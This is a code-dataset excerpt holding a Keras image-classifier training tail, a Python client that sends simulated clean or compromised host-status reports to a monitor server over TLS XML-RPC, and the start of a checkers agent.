iterator\nfor e in range(epochs):\n batches = 0\n for x_batch, y_batch in train_datagen.flow(x_train, y_train, batch_size=32):\n model.fit(x_batch, y_batch)\n batches += 1\n if batches >= len(x_train) / 32:\n # we need to break the loop by hand because\n # the generator loops indefinitely\n break\n\"\"\"\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nplt.plot(epochs, acc, 'r', label='Training accuracy')\nplt.plot(epochs, val_acc, 'b', label='Validation accuracy')\nplt.title('Training and validation accuracy')\nplt.legend(loc=0)\nplt.figure()\nplt.show()", "sub_path": "cnn_rock_paper_scissors.py", "file_name": "cnn_rock_paper_scissors.py", "file_ext": "py", "file_size_in_byte": 6551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.RMSprop", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}]} +{"seq_id": "320944269", "text": "import xmlrpc.client\nimport ssl\nimport socket # Required for network/socket connections\nimport os # Required for Forking/child processes\nimport time # Required for sleep call\nimport threading\nimport datetime\nimport dbm\nimport argparse\nimport random\nimport certs.gencert as gencert\nimport config\nimport logging\nfrom logging.config import fileConfig\n\n\n# Load logging config\nfileConfig('/home/shnuser/coding/shn/setup/logging.conf')\nlog = logging.getLogger(__name__)\n\n# Global Variables -- Don't change. [No need to change.]\nCERTFILE = \"/bin/shn/certs/domains/local.cert\" # Placeholder; updated when executed\nKEYFILE = \"/bin/shn/certs/domains/local.key\" # Placeholder; updated when executed\nhostIP = \"localhost\" # Default; updated when executed\nAGENT_ALIAS = \"agent\" # Default; updated to match agent hostname when run\nSLEEP_TIME = 60 # Default; updated based on user-provided input\nadmin_selected = False\n\n\n# Return pseudorandom decision on whether host is infected or\n# not; returns True if 'infected'\ndef getDecision():\n log.debug(\"Making a decision...\")\n number = random.randint(1, 99)\n if number > 89:\n answer = True\n else:\n answer = False\n\n log.debug(\"Is host infected: %s\" % answer)\n return answer\n\n\n# Return ip address of local host where server is running\ndef getMyIP():\n log.debug('Getting Host ip address')\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 53))\n ipAdd = s.getsockname()[0]\n s.close()\n log.debug('Socket closed: ipAdd=%s' % ipAdd)\n return ipAdd\n\n\n# Create SSL certs for current ip address if not already present\ndef verifyCerts():\n global CERTFILE\n global KEYFILE\n\n # Determine file path based on current ip address\n CERTFILE = ''.join([config.certPath, config.rootDomain, \".cert\"])\n KEYFILE = ''.join([config.certPath, config.rootDomain, \".key\"])\n log.debug(\"CERTFILE: %s\" % CERTFILE)\n log.debug(\"KEYFILE: %s\" % KEYFILE)\n\n # If cert or key file not present, create new certs\n if not os.path.isfile(CERTFILE) or not os.path.isfile(KEYFILE):\n gencert.gencert(config.rootDomain)\n log.info(\"Certfile(s) NOT present; new certs created.\")\n print(\"Certfile(s) NOT present; new certs created.\")\n\n else:\n log.info(\"Certfiles Verified Present\")\n print(\"Certfiles Verified Present\")\n\n\n# Test connection with Monitor\ndef testConnection(remoteName=config.mntrHostName,\n remotePort=config.mntrServerPort):\n\n log.debug(\"Start of Test Connection Function...\")\n myContext = ssl.create_default_context()\n myContext.load_verify_locations(config.CACERTFILE)\n\n myurl = ''.join(['https://', remoteName, ':', str(remotePort)])\n testResult = False\n\n with xmlrpc.client.ServerProxy(myurl,\n context=myContext) as proxy:\n # Test Connection\n try:\n print(\"Testing connection with Monitor:\")\n testResult = proxy.testConnection()\n\n except ConnectionRefusedError:\n log.warning(\"Connection to Monitor FAILED\")\n log.debug(\"Connection settings used: %s\" % (myurl))\n print(\"Connection to Monitor FAILED:\\n\",\n \"Is Monitor listening? Confirm connection\",\n \"settings and try again.\")\n print(\"Connection settings used:\\n '%s'\" % (myurl))\n\n if testResult:\n log.info(\"Connection Test to '%s' SUCCESSFUL!\" % myurl)\n print(\"Connection Test to '%s' SUCCESSFUL!\" % myurl)\n else:\n log.info(\"Connection Test to '%s' FAILED!\" % myurl)\n print(\"Connection Test to '%s' FAILED!\" % myurl)\n\n\n# Change/Update the Monitor's connection settings\ndef updateMonitor():\n log.debug(\"Updating Monitor connection settings\")\n print(\"DEFAULT Monitor Hostname: 'monitor.shn.local'\")\n print(\"CURRENT Monitor Hostname: '%s'\" % config.mntrHostName)\n print(\"ENTER NEW Monitor Hostname: ['q' to keep current]\")\n tempNewHost = input(\">>> \")\n if tempNewHost == 'q':\n log.debug(\"No Change\")\n elif tempNewHost == 'd':\n log.debug(\"Keeping Default\")\n config.mntrHostName = 'monitor.shn.local'\n else:\n config.mntrHostName = tempNewHost\n print(\"DEFAULT Monitor Port: '36363'\")\n print(\"CURRENT Monitor Port: '%s'\" % config.mntrServerPort)\n print(\"ENTER NEW Monitor Port: ['q' to keep current]\")\n tempNewPort = input(\">>> \")\n if tempNewPort == 'q':\n log.debug(\"No Change\")\n elif tempNewPort == 'd':\n log.debug(\"Keeping Default\")\n config.mntrServerPort = 36363\n else:\n config.mntrServerPort = int(tempNewPort)\n\n print(\"UPDATED Monitor Saved: '%s', Port: '%d'\" % (config.mntrHostName,\n config.mntrServerPort))\n log.debug(\"Monitor Saved: '%s', Port: '%d'\" % (config.mntrHostName,\n config.mntrServerPort))\n\n\n# Print entire stored status history\ndef printHistory():\n log.debug(\"Printing entire stored status history...\")\n\n currentTotal = 0\n\n try:\n with dbm.open('cache_esm', 'r') as db:\n currentTotal = int((db.get('total')).decode(\"utf-8\"))\n log.debug(\"Cache found. Total Retrieved.\")\n print(\"Total Saved: %d\" % currentTotal)\n\n except:\n log.debug(\"No cache found or read failed.\")\n print(\"READ FAILED or No Current Status Present\")\n\n if currentTotal > 0:\n # Display history\n log.debug(\"Current Total > 0\")\n print(\"[Update #]: [Update Time] >>> [Status]\")\n for k in range(currentTotal):\n try:\n with dbm.open('cache_esm', 'r') as db:\n readstatus = \"%s.status\" % (k+1)\n readtime = \"%s.time\" % (k+1)\n thisTime = (db.get(readtime)).decode(\"utf-8\")\n thisStatus = (db.get(readstatus)).decode(\"utf-8\")\n if thisStatus == '1':\n pStatus = \"CLEAN ['1']\"\n elif thisStatus == '999':\n pStatus = \"COMPROMISED ['999']\"\n else:\n pStatus = \"UNKNOWN ['???']\"\n print(\"%d: %s >>> %s\" % ((k+1), thisTime, pStatus))\n except:\n log.debug(\"Read Failed with Item %d!\" % (k+1))\n print(\"READ FAILED!\")\n print(\"End of History\")\n log.debug(\"End of History\")\n\n else:\n log.debug(\"No Status. Exiting.\")\n print(\"No Status. Exiting.\")\n\n\n# Check currently-recorded status of ESM/VM\ndef checkStatus():\n log.debug(\"Checking current ESM/VM Status...\")\n try:\n with dbm.open('cache_esm', 'r') as db:\n lastUpdate = (db.get('last_update')).decode(\"utf-8\")\n lastStatus = (db.get('last_status')).decode(\"utf-8\")\n log.debug(\"Cache found. Values retrieved.\")\n print(\"ESM/VM Status:\")\n if lastStatus == \"1\":\n print(\"CLEAN ['1'] (as of %s)\" % lastUpdate)\n log.debug(\"CLEAN ['1'] (as of %s)\" % lastUpdate)\n elif lastStatus == \"999\":\n print(\"COMPROMISED ['999'] (as of %s)\" % lastUpdate)\n log.debug(\"COMPROMISED ['999'] (as of %s)\" % lastUpdate)\n else:\n print(\"Unknown Status!!!\")\n log.debug(\"Unknown Status!!!\")\n\n except:\n log.debug(\"No cache found or read failed.\")\n print(\"READ FAILED or No Current Status Present\")\n\n\n# View current monitor connection settings\ndef viewConnection():\n log.debug(\"Checking current Monitor Connection Settings...\")\n\n print(\"\\nMonitor Settings:\")\n print(\"HostName: %s\" % config.mntrHostName)\n print(\"Port: %d\" % config.mntrServerPort)\n log.debug(\"Reading last successful transmit time...\")\n try:\n with dbm.open('cache_esm', 'w') as db:\n lastUpdate = (db.get('last_update')).decode(\"utf-8\")\n log.debug(\"Cache found. Value retrieved.\")\n except:\n log.debug(\"No cache found or read failed.\")\n lastUpdate = \"NONE recorded!!\"\n\n print(\"Last Successful Transmit: %s\" % lastUpdate)\n\n log.debug(\"End of View Connection Function\")\n\n\n# Simple test function to ensure communication is working\ndef mathTest():\n\n log.debug(\"Start of Math Test Function...\")\n myContext = ssl.create_default_context()\n myContext.load_verify_locations(config.CACERTFILE)\n\n myurl = ''.join(['https://', config.mntrHostName, ':',\n str(config.mntrServerPort)])\n\n with xmlrpc.client.ServerProxy(myurl,\n context=myContext) as proxy:\n try:\n print(\"3 + 7 is %d\" % (proxy.add(3, 7)))\n print(\"11 x 9 is: %d\" % (proxy.multiply(11, 9)))\n\n except ConnectionRefusedError:\n log.warning(\"Connection to Monitor Server REFUSED\")\n print(\"Connection to Monitor Server FAILED:\\n\",\n \"Is Monitor listening? Confirm connection\",\n \"settings and port number and try again.\")\n print(\"Settings used: '%s'\" % myurl)\n\n except:\n log.warning(\"Connection to Monitor Server FAILED\")\n print(\"Connection Failed. Suspected incorrect URL.\")\n print(\"Settings used: '%s'\" % myurl)\n\n\ndef logStatus(logStatus, logTime):\n log = logging.getLogger(__name__)\n log.debug(\"Saving Status: %s, at Time: %s\" % (logStatus, logTime))\n storeStatus = str(logStatus)\n storeTime = str(logTime)\n log.debug(\"Values Storing: %s, %s\" % (storeStatus, storeTime))\n\n try:\n with dbm.open('cache_esm', 'w') as db:\n # Get current total and add 1 with type conversions\n newtotal = str(int((db.get('total')).decode(\"utf-8\")) + 1)\n # Store new total in persistent storage\n db['total'] = newtotal\n # Create names based on connection number\n savestatus = \"%s.status\" % (newtotal)\n savetime = \"%s.time\" % (newtotal)\n # Save connection info to persistent storage\n db[savestatus] = storeStatus\n db[savetime] = storeTime\n db['last_update'] = storeTime\n db['last_status'] = storeStatus\n log.debug(\"Cache found. Values stored in old cache.\")\n log.debug(\"Saved: %s, %s\" % (storeStatus, storeTime))\n\n except:\n log.debug(\"No cache file found; creating new file.\")\n with dbm.open('cache_esm', 'c') as db:\n db['total'] = \"1\"\n savestatus = \"1.status\"\n savetime = \"1.time\"\n db[savestatus] = storeStatus\n db[savetime] = storeTime\n db['last_update'] = storeTime\n db['last_status'] = storeStatus\n log.debug(\"Saved: %s, %s\" % (storeStatus, storeTime))\n\n log.debug(\"End of log status function\")\n\n\n# Send status update\ndef sendStatus(state=0, userInput=True):\n\n log.debug(\"Start of Send Status Function...\")\n myContext = ssl.create_default_context()\n myContext.load_verify_locations(config.CACERTFILE)\n\n if userInput:\n print(\"Enter Current Status:\")\n print(\"1) CLEAN ['1']\")\n print(\"2) COMPROMISED ['999']\")\n answer = input(\"Make a choice\\n>>> \")\n if answer == \"1\":\n mystatus = 1\n else:\n mystatus = 999\n\n if mystatus == 1:\n print(\"Status selected: 'CLEAN'\")\n else:\n print(\"Status selected: 'COMPROMISED'\")\n print(\"If this is incorrect, resubmit IMMEDIATELY!\")\n\n else:\n mystatus = state\n\n myurl = ''.join(['https://', config.mntrHostName, ':',\n str(config.mntrServerPort)])\n with xmlrpc.client.ServerProxy(myurl,\n context=myContext) as proxy:\n try:\n response = proxy.reportStatus(hostIP, mystatus,\n AGENT_ALIAS)\n log.debug(\"Response: %s\" % response)\n if userInput:\n print(\"Response from Monitor: %s\" % response)\n timeConfirmed = str(datetime.datetime.now())\n print(\"Status '%s' Sent to Monitor; Confirmed at %s.\" % (mystatus,\n timeConfirmed))\n log.debug(\"Time Confirmed: %s\" % timeConfirmed)\n logStatus(mystatus, timeConfirmed)\n log.debug(\"Status Logged\")\n\n except ConnectionRefusedError:\n log.warning(\"Connection to Monitor Server FAILED\")\n if userInput:\n print(\"Connection to Monitor Server FAILED:\\n\",\n \"Is Monitor listening? Confirm connection\",\n \"settings and try again.\")\n print(\"Settings used: '%s'\" % myurl)\n\n except:\n log.warning(\"Connection to Monitor Server FAILED\")\n if userInput:\n print(\"Connection Failed. Suspected incorrect URL.\")\n print(\"Settings used: '%s'\" % myurl)\n\n\ndef deleteHistory(no_confirmation=False):\n log.info(\"Delete History Function starting...\")\n confirm = False\n if no_confirmation:\n confirm = True\n else:\n # Get confirmation from user\n print(\"Confirm you wish to DELETE ALL SAVED HISTORY:\")\n answer = input(\"Confirm YES['y'] or NO['n']:\\n>>> \")\n\n if answer in [\"y\", \"Y\", \"YES\", \"yes\", \"Yes\"]:\n log.debug(\"Request for deletion confirmed.\")\n confirm = True\n else:\n log.debug(\"Request for deletion cancelled.\")\n log.debug(\"Answer selected: %s\" % answer)\n confirm = False\n\n # Delete history, if confirmed\n if confirm:\n log.debug(\"Removing history now.\")\n os.remove(\"cache_esm\")\n log.info(\"History Deleted.\")\n else:\n log.debug(\"History was NOT deleted.\")\n\n\n# Run basic 'simulator' to determine infection status\ndef basicSimulation(sleeptime=60):\n log.debug(\"Running basic simulation\")\n\n # Report status as CLEAN three times\n log.debug(\"Reporting status CLEAN three times.\")\n\n for k in range(3):\n currentStatus = 1\n\n # Log current state\n log.debug(\"Current Status: CLEAN ['1']\")\n\n # Report current state\n sendStatus(state=currentStatus, userInput=False)\n\n # Sleep One Time period\n time.sleep(sleeptime)\n\n # Report status as COMPROMISED three times\n for k in range(3):\n currentStatus = 999\n\n # Log current state\n log.debug(\"Current Status: COMPROMISED ['999']\")\n # If this is the first time this is reported compromised\n # then log as a warning and print as well\n if k == 0:\n log.warning(\"HOST NOW COMPROMISED ['999']!!!\")\n print(\"HOST NOW COMPROMISED ['999']!!! TAKE ACTION!!!\")\n\n # Report current state\n sendStatus(state=currentStatus, userInput=False)\n\n # Sleep One Time period\n time.sleep(sleeptime)\n\n\n# Run 'simulator' to randomly determine infection status\ndef randomSimulation(sleeptime=60):\n log.debug(\"Running random simulation\")\n while True:\n # Get current status\n log.debug(\"Checking current ESM/VM Status...\")\n lastStatus = 1\n currentStatus = 1\n try:\n with dbm.open('cache_esm', 'r') as db:\n lastStatus = int((db.get('last_status')).decode(\"utf-8\"))\n log.debug(\"Cache found. Values retrieved: %d\" % lastStatus)\n except:\n log.debug(\"No cache found or read failed.\")\n print(\"READ FAILED or No Current Status Present\")\n\n # If current is infected, remain infected\n if not lastStatus == 1:\n currentStatus = lastStatus\n\n # If current not infected, get new decision\n else:\n r = getDecision()\n if r:\n currentStatus = 999\n else:\n currentStatus = 1\n\n # Log current state\n if currentStatus == 1:\n log.debug(\"Current Status: CLEAN ['1']\")\n elif currentStatus == 999:\n log.debug(\"Current Status: COMPROMISED ['999']\")\n\n # If this is the first time this is reported compromised\n # then log as a warning and print as well\n if not lastStatus == 999:\n log.warning(\"HOST NOW COMPROMISED ['999']!!!\")\n print(\"HOST NOW COMPROMISED ['999']!!! TAKE ACTION!!!\")\n\n else:\n log.debug(\"Unknown Status!!! ... %d\" % currentStatus)\n\n # Report current state\n sendStatus(state=currentStatus, userInput=False)\n\n # Sleep for set time limit before repeating\n log.debug(\"Sleeping for %d seconds.\" % sleeptime)\n time.sleep(sleeptime)\n\n\n# Start basic simulation as background / thread process\ndef startBasicSimulation():\n\n log.info(\"Starting basic simulation as background thread\")\n t = threading.Thread(name=\"BasicSimulation\",\n target=basicSimulation,\n args=(SLEEP_TIME,\n )\n )\n t.daemon = True\n log.debug(\"Starting daemon simulation thread\")\n t.start()\n\n\n# Quit gracefully after terminting all child processes\ndef myQuit():\n log.info(\"ESM Exiting. Goodbye.\")\n\n print(\"ESM Exiting. Goodbye.\\n\")\n raise SystemExit\n\n\ndef invalid(choice):\n log.debug(\"Invalid choice: %s\" % choice)\n print(\"INVALID CHOICE!\")\n\n\ndef adminMenu():\n log.debug(\"Displaying admin menu\")\n print(\"\\nAdmin Menu:\")\n print(\"a) Connection Test (simple math test)\")\n print(\"b) SSL Verification (verify certificates\")\n print(\"c) View ALL Saved History\")\n print(\"d) Delete ESM History\")\n print(\"e) Send Status* to Monitor [user-provided status]\")\n print(\"f) CHANGE/UPDATE Monitor Settings\")\n print(\"9) BACK (return to 'Menu')\")\n return input(\"Make a Choice\\n>>> \")\n\n\ndef adminSelection():\n global admin_selected\n adminChoice = adminMenu()\n if adminChoice == \"a\":\n mathTest()\n elif adminChoice == \"b\":\n verifyCerts()\n elif adminChoice == \"c\":\n printHistory()\n elif adminChoice == \"d\":\n deleteHistory()\n elif adminChoice == \"e\":\n sendStatus()\n elif adminChoice == \"f\":\n updateMonitor()\n elif adminChoice == \"9\":\n log.debug(\"Admin is De-selected\")\n print(\"Back to Main Menu...\")\n admin_selected = False\n elif adminChoice == \"r\":\n # Refresh Menu (do nothing)\n log.info(\"Refreshing Menu\")\n elif adminChoice in [\"q\", \":q\"]:\n myQuit()\n else:\n invalid(adminChoice)\n\n\ndef menu():\n log.debug(\"Displaying menu\")\n print(\"\\n\\nMENU[ESM]:\")\n print(\"1) Check current ESM status\")\n print(\"2) View Monitor Connection Settings\")\n print(\"3) Send 'CLEAN' Status to Monitor\")\n print(\"4) Send 'COMPROMISED' Status to Monitor\")\n print(\"5) Start BASIC Simulation [in background]\")\n print(\"6) Test Connection with Monitor\")\n print(\"9) ADMIN MENU\")\n print(\"q) QUIT\")\n return input(\"Make a Choice\\n>>> \")\n\n\ndef myMenu():\n global admin_selected\n choice = 0\n if admin_selected:\n choice = \"9\"\n else:\n choice = menu()\n if choice == \"1\":\n checkStatus()\n elif choice == \"2\":\n viewConnection()\n elif choice == \"3\":\n sendStatus(state=1, userInput=False)\n elif choice == \"4\":\n sendStatus(state=999, userInput=False)\n elif choice == \"5\":\n startBasicSimulation()\n elif choice == \"6\":\n testConnection()\n elif choice == \"9\":\n admin_selected = True\n log.debug(\"Admin is Selected\")\n adminSelection()\n elif choice in [\"q\", \":q\"]:\n myQuit()\n elif choice == \"r\":\n # Refresh Menu (do nothing)\n log.info(\"Refreshing Menu\")\n else:\n invalid(choice)\n\n\n# Process arguments and notify user of their choices\ndef processArguments(args):\n log.info(\"Processing arguments...\")\n\n global AGENT_ALIAS\n global SLEEP_TIME\n\n # Accept user-provided monitor hostname, if provided\n if args.monitor:\n print(\"Monitor hostname set manually\")\n print(\"Using hostname: %s\" % (args.monitor))\n log.debug(\"Using monitor hostname: %s\" % (args.monitor))\n config.mntrHostName = args.monitor\n\n else:\n print(\"Using default monitor hostname: %s\" % config.mntrHostName)\n log.debug(\"Using default monitor hostname: %s\" % config.mntrHostName)\n\n # Accept user-provided monitor port number, if provided\n if args.port:\n print(\"Monitor port set manually\")\n print(\"Using port#: %d\" % (args.port))\n log.debug(\"Using monitor port#: %d\" % (args.port))\n config.mntrServerPort = args.port\n\n else:\n print(\"Using default monitor port#: %s\" % config.mntrServerPort)\n log.debug(\"Using default monitor port#: %s\" % config.mntrServerPort)\n\n # Accept user-provided monitor port number, if provided\n if args.alias:\n print(\"ESM Alias set manually\")\n print(\"Using alias: %s\" % (args.alias))\n log.debug(\"Using ESM alias: %s\" % (args.alias))\n AGENT_ALIAS = args.alias\n\n else:\n AGENT_ALIAS = (config.agntHostName).split('.')[0]\n log.debug(\"Using default ESM Alias: %s\" % (AGENT_ALIAS))\n print(\"Using alias: %s\" % (AGENT_ALIAS))\n\n # Accept user-provided sleep time, if provided\n if args.time:\n print(\"Sleep time set manually\")\n print(\"Using sleep = %d seconds\" % (args.time))\n log.debug(\"Using sleep = %d seconds\" % (args.time))\n SLEEP_TIME = args.time\n\n # Announce running in Basic Simulation mode, if applicable\n if args.basic:\n print(\"ESM running simulation in basic mode.\")\n log.debug(\"ESM running simulation in basic mode.\")\n\n # Announce running in Simulation mode, if applicable\n if args.simulation:\n print(\"ESM now executing in simulation mode.\")\n log.debug(\"ESM executing in simulation mode.\")\n\n # Delete previous status hisotry, if applicable\n if args.fresh:\n log.debug(\"Fresh start selected.\")\n deleteHistory(True)\n print(\"History Deleted: Starting Fresh\")\n\n log.info(\"End of 'process arguments.'\")\n\n\n# Start of Main\nif __name__ == '__main__':\n log.info(\"Starting MAIN. Parsing arguments.\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-S\", \"--simulation\", help=\"run ESM in simulation\\\n mode, which does not allow user interaction\",\n action=\"store_true\")\n parser.add_argument(\"-B\", \"--basic\", help=\"run simulation in basic mode\\\n (3 clean reports, then 3 compromised reports)\\\n Recommendation: Use with '-t' flag to adjust pace.\",\n action=\"store_true\")\n parser.add_argument(\"-t\", \"--time\", help=\"set sleep time [in seconds]\\\n used for simulation (Default: 60)\", type=int)\n parser.add_argument(\"-m\", \"--monitor\", help=\"set hostname of monitor\\\n (e.g., 'monitor.shn.local')\")\n parser.add_argument(\"-p\", \"--port\", help=\"set port of monitor\\\n (e.g., '36363')\", type=int)\n parser.add_argument(\"-a\", \"--alias\", help=\"manually set ESM alias\\\n (Note: MUST match alias of Agent running in\\\n corresponding VM's hypervisor.)\")\n parser.add_argument(\"-F\", \"--fresh\", help=\"start fresh: remove status\\\n history before starting\", action=\"store_true\")\n args = parser.parse_args()\n\n # Process arguments\n processArguments(args)\n\n # Start of Main functionality\n log.info(\"Starting Main [ESM]\")\n hostIP = getMyIP()\n pid = os.getpid()\n print(\"Host IP: %s\" % (hostIP))\n log.debug(\"PID: %d\" % (pid))\n\n # Verify certificates present prior to displaying menu\n log.debug(\"Verifying certificates.\")\n verifyCerts()\n time.sleep(2)\n\n # If NOT simulation mode, dispaly menu [repeatedly] for user\n if not args.simulation:\n while True:\n myMenu()\n time.sleep(1)\n\n # Otherwise, start daemon loop retrieving no user input\n else:\n if args.basic:\n log.info(\"Simulation loop started now (Mode=Basic).\")\n while True:\n basicSimulation(SLEEP_TIME)\n log.info(\"End of Basic simulation: Repeating.\")\n else:\n log.info(\"Simulation loop started now (Mode=Normal).\")\n randomSimulation(SLEEP_TIME)\n", "sub_path": "esm_auto/esm.py", "file_name": "esm.py", "file_ext": "py", "file_size_in_byte": 24575, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.config.fileConfig", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 47, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 47, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 47, "usage_type": "attribute"}, {"api_name": "config.certPath", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.rootDomain", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.certPath", "line_number": 62, "usage_type": "attribute"}, {"api_name": "config.rootDomain", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "certs.gencert.gencert", "line_number": 68, "usage_type": "call"}, {"api_name": "certs.gencert", "line_number": 68, "usage_type": "name"}, {"api_name": "config.rootDomain", "line_number": 68, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 78, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 79, "usage_type": "attribute"}, {"api_name": "ssl.create_default_context", "line_number": 82, "usage_type": "call"}, {"api_name": "config.CACERTFILE", "line_number": 83, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.client.ServerProxy", "line_number": 88, "usage_type": "call"}, {"api_name": "xmlrpc.client.client", "line_number": 88, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 88, "usage_type": "name"}, {"api_name": "config.mntrHostName", "line_number": 115, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 122, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 124, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 126, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 133, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 135, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 137, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 138, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 139, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 140, "usage_type": "attribute"}, {"api_name": "dbm.open", "line_number": 150, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 165, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 192, "usage_type": "call"}, {"api_name": "config.mntrHostName", "line_number": 217, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 218, "usage_type": "attribute"}, {"api_name": "dbm.open", "line_number": 221, "usage_type": "call"}, {"api_name": "ssl.create_default_context", "line_number": 237, "usage_type": "call"}, {"api_name": "config.CACERTFILE", "line_number": 238, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 240, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 241, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.client.ServerProxy", "line_number": 243, "usage_type": "call"}, {"api_name": "xmlrpc.client.client", "line_number": 243, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 243, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 263, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 270, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 288, "usage_type": "call"}, {"api_name": "ssl.create_default_context", "line_number": 305, "usage_type": "call"}, {"api_name": "config.CACERTFILE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 327, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 328, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.client.ServerProxy", "line_number": 329, "usage_type": "call"}, {"api_name": "xmlrpc.client.client", "line_number": 329, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 329, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 337, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 337, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 380, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 403, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 421, "usage_type": "call"}, {"api_name": "dbm.open", "line_number": 433, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 472, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 479, "usage_type": "call"}, {"api_name": "config.mntrHostName", "line_number": 601, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 604, "usage_type": "attribute"}, {"api_name": "config.mntrHostName", "line_number": 605, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 612, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 615, "usage_type": "attribute"}, {"api_name": "config.mntrServerPort", "line_number": 616, "usage_type": "attribute"}, {"api_name": "config.agntHostName.split", "line_number": 626, "usage_type": "call"}, {"api_name": "config.agntHostName", "line_number": 626, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 659, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 686, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 693, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 699, "usage_type": "call"}]} +{"seq_id": "366709850", "text": "\"\"\"\nA checkers agent implementation based on Arthur Samuel's historic program.\n\"\"\"\nfrom utils import (\n INF, adv, cent, cntr, deny, kcent, mob, mov, thret, back, piece_score_diff,\n position_score, Player,\n)\n\n\nclass ArthurPlayer(Player):\n\n def evaluate(self, board_old, board_new):\n if 